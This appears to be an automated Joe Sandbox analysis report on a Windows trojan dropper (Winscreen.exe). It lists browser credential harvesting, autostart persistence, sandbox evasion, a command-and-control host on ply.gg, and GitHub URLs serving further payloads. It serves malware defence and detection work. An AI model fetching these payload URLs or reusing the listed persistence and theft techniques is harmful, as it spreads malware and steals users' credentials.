                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\taskmen.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmoder.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeQueries volume information: C:\Users\user\AppData\Roaming\Client (1).vmp.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmoder.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Users\user\AppData\Roaming\taskmoder.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC20754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,34_2_00007FF6FDC20754
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC04EB0 GetVersionExW,34_2_00007FF6FDC04EB0
                        Source: C:\Users\user\Desktop\Winscreen.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: taskmoder.exe, 0000001F.00000002.3027507006.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe, 00000030.00000002.4544194857.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, taskmoder.exe, 0000003E.00000002.4535102705.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information12
                        Scripting                        		1
                        Replication Through Removable Media                        		231
                        Windows Management Instrumentation                        		12
                        Scripting                        		1
                        Exploitation for Privilege Escalation                        		111
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		3
                        Obfuscated Files or Information                        		LSASS Memory1
                        Peripheral Device Discovery                        		Remote Desktop Protocol2
                        Browser Session Hijacking                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		11
                        Process Injection                        		2
                        Software Packing                        		Security Account Manager3
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Data from Local System                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        PowerShell                        		31
                        Registry Run Keys / Startup Folder                        		1
                        Scheduled Task/Job                        		1
                        Timestomp                        		NTDS147
                        System Information Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script31
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		LSA Secrets781
                        Security Software Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials1
                        Process Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items243
                        Masquerading                        		DCSync471
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job471
                        Virtualization/Sandbox Evasion                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526464 Sample: Winscreen.exe Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 125 start-supplier.at.ply.gg 2->125 127 raw.githubusercontent.com 2->127 129 2 other IPs or domains 2->129 157 Antivirus / Scanner detection for submitted sample 2->157 159 Multi AV Scanner detection for dropped file 2->159 161 Multi AV Scanner detection for submitted file 2->161 163 11 other signatures 2->163 11 Winscreen.exe 1 8 2->11         started        15 explorer.exe 2->15         started        17 cmd.exe 2->17         started        19 9 other processes 2->19 signatures3 process4 file5 107 C:\Users\user\AppData\Roaming\upx.exe, PE32 11->107 dropped 109 C:\Users\user\AppData\Roaming\taskmoder.exe, PE32 11->109 dropped 111 C:\Users\user\AppData\Roaming\explorer.exe, PE32 11->111 dropped 117 2 other malicious files 11->117 dropped 191 Query firmware table information (likely to detect VMs) 11->191 193 Creates multiple autostart registry keys 11->193 195 Bypasses PowerShell execution policy 11->195 201 3 other signatures 11->201 21 taskmen.exe 11->21         started        26 taskmoder.exe 11->26         started        28 explorer.exe 5 11->28         started        38 6 other processes 11->38 113 C:\Windows\Temp\swtpd1aw.exe, PE32 15->113 dropped 115 C:\Windows\Temp\05mor1jc.inf, Windows 15->115 dropped 197 Hides threads from debuggers 15->197 30 cmstp.exe 15->30         started        199 Drops executables to the windows directory (C:\Windows) and starts them 17->199 32 ydztkyrb.exe 17->32         started        34 conhost.exe 17->34         started        36 swtpd1aw.exe 19->36         started        40 3 other processes 19->40 signatures6 process7 dnsIp8 131 github.com 140.82.121.3, 443, 49786, 49790 GITHUBUS United States 21->131 133 raw.githubusercontent.com 185.199.110.133, 443, 49800 FASTLYUS Netherlands 21->133 91 C:\Windows\Client.exe, PE32+ 21->91 dropped 93 C:\Users\user\AppData\Roaming\...\taskmen.exe, PE32 21->93 dropped 95 C:\Users\user\AppData\Local\...\ch1pl1en.gh2, PE32 21->95 dropped 103 3 other malicious files 21->103 dropped 165 Query firmware table information (likely to detect VMs) 21->165 167 Creates autorun.inf (USB autostart) 21->167 169 Creates multiple autostart registry keys 21->169 171 Drops executables to the windows directory (C:\Windows) and starts them 21->171 42 Client.exe 21->42         started        46 cmd.exe 21->46         started        97 C:\ProgramData\winlog.vbs, Unicode 26->97 dropped 173 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->173 175 Sets a proxy for the internet explorer 26->175 177 Queries memory information (via WMI often done to detect virtual machines) 26->177 179 Enables a proxy for the internet explorer 26->179 48 cmd.exe 26->48         started        50 wscript.exe 26->50         started        52 cmd.exe 26->52         started        58 3 other processes 26->58 99 C:\Windows\Temp\ydztkyrb.exe, PE32 28->99 dropped 101 C:\Windows\Temp\xtm5g4p2.inf, Windows 28->101 dropped 181 Hides threads from debuggers 28->181 54 cmstp.exe 28->54         started        183 Protects its processes via BreakOnTermination flag 32->183 185 Loading BitLocker PowerShell Module 38->185 56 conhost.exe 38->56         started        60 4 other processes 38->60 file9 signatures10 process11 file12 105 C:\Users\user\AppData\...\Client (1).vmp.exe, PE32 42->105 dropped 187 Multi AV Scanner detection for dropped file 42->187 62 Client (1).vmp.exe 42->62         started        67 Client (1).vmp.exe 42->67         started        69 powershell.exe 46->69         started        71 conhost.exe 46->71         started        73 cmd.exe 46->73         started        75 wscript.exe 48->75         started        77 2 other processes 48->77 189 Creates an undocumented autostart registry key 50->189 79 2 other processes 52->79 81 3 other processes 58->81 signatures13 process14 dnsIp15 135 start-supplier.at.ply.gg 209.25.140.180, 49852, 49962, 49988 COGECO-PEER1CA Canada 62->135 119 C:\pastibin.exe, PE32 62->119 dropped 121 C:\Users\user\AppData\...\Client (1).vmp.exe, PE32 62->121 dropped 139 Query firmware table information (likely to detect VMs) 62->139 141 Creates autostart registry keys with suspicious names 62->141 143 Creates multiple autostart registry keys 62->143 145 Hides threads from debuggers 67->145 137 127.0.0.1 unknown unknown 69->137 123 \Device\ConDrv, ASCII 69->123 dropped 147 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 69->147 149 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 69->149 151 Tries to harvest and steal browser information (history, passwords, etc) 69->151 153 Creates an undocumented autostart registry key 75->153 155 Windows Scripting host queries suspicious COM object (likely to drop second stage) 75->155 83 taskkill.exe 75->83         started        85 userinit.exe 75->85         started        file16 signatures17 process18 process19 87 conhost.exe 83->87         started        89 explorer.exe 85->89         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Winscreen.exe34%ReversingLabs
                        Winscreen.exe42%VirustotalBrowse
                        Winscreen.exe100%AviraHEUR/AGEN.1313163
                        Winscreen.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Disk.flv.exe100%Joe Sandbox ML
                        C:\ProgramData\Synaptics\taskmen.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe75%ReversingLabsByteCode-MSIL.Trojan.Perseus
                        C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe55%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Client (1).vmp.exe75%ReversingLabsByteCode-MSIL.Trojan.Perseus
                        C:\Users\user\AppData\Roaming\Client (1).vmp.exe55%VirustotalBrowse
                        C:\Windows\Client.exe70%ReversingLabsByteCode-MSIL.Trojan.Perseus
                        C:\Windows\Client.exe53%VirustotalBrowse
                        C:\pastibin.exe75%ReversingLabsByteCode-MSIL.Trojan.Perseus
                        C:\pastibin.exe55%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        start-supplier.at.ply.gg1%VirustotalBrowse
                        github.com0%VirustotalBrowse
                        raw.githubusercontent.com0%VirustotalBrowse

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        start-supplier.at.ply.gg
                        		209.25.140.180
                        		truefalseunknown
                        github.com
                        		140.82.121.3
                        		truefalseunknown
                        raw.githubusercontent.com
                        		185.199.110.133
                        		truefalseunknown
                        240.163.3.0.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/taskmoder.exefalse
                            http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exefalse
                              https://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exefalse
                                http://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exefalse
                                  https://raw.githubusercontent.com/darkZeusWeb/loadersoft/refs/heads/main/Client.exefalse

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2106981246.00000277BF231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2089574669.00000277AF3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://ion=v4.5powershell.exe, 0000000B.00000002.2303338366.000001E9B4316000.00000004.00000020.00020000.00000000.sdmpfalse
                                              https://github.comtaskmen.exe, 00000020.00000002.4582393087.000000000313B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2089574669.00000277AF3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://contoso.com/powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2106981246.00000277BF231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLplaces.raw.43.drfalse
                                                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2283411365.000001E9ABC31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.2089574669.00000277AF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BBC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              https://support.mozilla.orgplaces.raw.43.drfalse
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2089574669.00000277AF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2177556542.000001E99BBC1000.00000004.00000800.00020000.00000000.sdmp, taskmen.exe, 00000020.00000002.4582393087.000000000310D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.raw.43.drfalse
                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2177556542.000001E99BDE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      http://go.microsoft.cMupx.exe, 00000011.00000002.2175605173.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        209.25.140.180
                                                                        		start-supplier.at.ply.ggCanada
                                                                        		13768COGECO-PEER1CAfalse
                                                                        140.82.121.3
                                                                        		github.comUnited States
                                                                        		36459GITHUBUSfalse
                                                                        185.199.110.133
                                                                        		raw.githubusercontent.comNetherlands
                                                                        		54113FASTLYUSfalse

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1526464
                                                                        Start date and time:2024-10-05 21:56:08 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 15m 27s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:71
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Winscreen.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.spre.bank.adwa.spyw.expl.evad.mine.winEXE@102/183@6/4
                                                                        EGA Information:
                                                                        • Successful, ratio: 60%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 292
                                                                        • Number of non-executed functions: 47
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target Client (1).vmp.exe, PID 1576 because it is empty
                                                                        • Execution Graph export aborted for target explorer.exe, PID 6128 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 1848 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3624 because it is empty
                                                                        • Execution Graph export aborted for target upx.exe, PID 5588 because it is empty
                                                                        • Execution Graph export aborted for target upx.exe, PID 5988 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        15:57:02API Interceptor9922x Sleep call for process: powershell.exe modified
                                                                        15:57:30API Interceptor115550x Sleep call for process: taskmen.exe modified
                                                                        15:58:09API Interceptor73334x Sleep call for process: taskmoder.exe modified
                                                                        15:58:14API Interceptor129385x Sleep call for process: Client (1).vmp.exe modified
                                                                        15:58:21API Interceptor1x Sleep call for process: userinit.exe modified
                                                                        21:57:09Task SchedulerRun new task: explorer path: C:\Users\user\AppData\Roaming\explorer.exe
                                                                        21:57:09Task SchedulerRun new task: upx path: C:\Users\user\AppData\Roaming\upx.exe
                                                                        21:57:28Task SchedulerRun new task: taskmoder path: C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                        21:57:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run taskmoder C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                        21:57:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run taskmen C:\Users\user\AppData\Roaming\reg.lnk
                                                                        21:57:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Client (1).vmp C:\Users\user\AppData\Roaming\Client (1).vmp.exe
                                                                        21:57:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run taskmoder C:\Users\user\AppData\Roaming\taskmoder.exe
                                                                        21:58:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run taskmen C:\Users\user\AppData\Roaming\reg.lnk
                                                                        21:58:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Client (1).vmp C:\Users\user\AppData\Roaming\Client (1).vmp.exe
                                                                        21:58:36AutostartRun: WinLogon Shell C:\Windows\taskmen.exe

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        209.25.140.180TYLtsVPB7g.exeGet hashmaliciousUnknownBrowse
                                                                          FWH67NqQmR.exeGet hashmaliciousUnknownBrowse
                                                                            d0sIudDmBS.exeGet hashmaliciousUnknownBrowse
                                                                              download.exeGet hashmaliciousNjratBrowse
                                                                                Arch_njload.ps1Get hashmaliciousNjratBrowse
                                                                                  UltraViewerUpdateService.exeGet hashmaliciousXWormBrowse
                                                                                    winlogin.exeGet hashmaliciousXWormBrowse
                                                                                      140.82.121.3stubInf.exeGet hashmaliciousXmrigBrowse
                                                                                      • github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
                                                                                      6glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                                                                      • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                                                                      firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                                                                      • github.com/john-xor/temp/blob/main/index.html?raw=true
                                                                                      0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                      • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                                                      MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                                                                      • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                                                      RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                      • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                      185.199.110.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                      • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      raw.githubusercontent.comstubInf.exeGet hashmaliciousXmrigBrowse
                                                                                      • 185.199.110.133
                                                                                      MKWbWHd5Ni.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.111.133
                                                                                      DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 185.199.109.133
